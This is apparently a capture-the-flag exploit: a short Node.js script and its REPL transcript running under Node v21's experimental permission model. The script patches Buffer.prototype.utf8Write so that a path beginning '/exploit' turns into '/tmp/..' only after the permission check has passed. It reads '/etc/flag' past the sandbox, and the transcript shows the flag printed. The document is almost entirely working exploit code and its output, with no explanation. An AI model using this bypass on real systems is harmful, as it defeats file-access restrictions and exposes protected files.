const fs = require('fs');
Buffer.prototype.utf8Write = ((w) => function (str, ...args) {
    return w.apply(this, [str.replace(/^\/exploit/, '/tmp/..'), ...args]);
})(Buffer.prototype.utf8Write);
console.log(fs.readFileSync(new TextEncoder().encode('/exploit/etc/flag')).toString());
.exit
Welcome to Node.js v21.0.0.
Type ".help" for more information.
[1G[0J> [3G
Access to FileSystemWrite is restricted.
REPL session history will not be persisted.
[1G[0J> [3G(node:8) ExperimentalWarning: Permission is an experimental feature
(Use `node --trace-warnings ...` to show where the warning was created)
const fs = require('fs');
[90mundefined[39m
[1G[0J> [3GBuffer.prototype.utf8Write = ((w) => function (str, ...args) {
[1G[0J... [5G    return w.apply(this, [str.replace(/^\/exploit/, '/tmp/..'), ...args]);
[1G[0J... [5G})(Buffer.prototype.utf8Write);
[36m[Function (anonymous)][39m
[1G[0J> [3Gconsole.log(fs.readFileSync(new TextEncoder().encode('/exploit/etc/flag')).toString());
fYKyKufl/6zciKqM

[90mundefined[39m
[1G[0J> [3G.exit

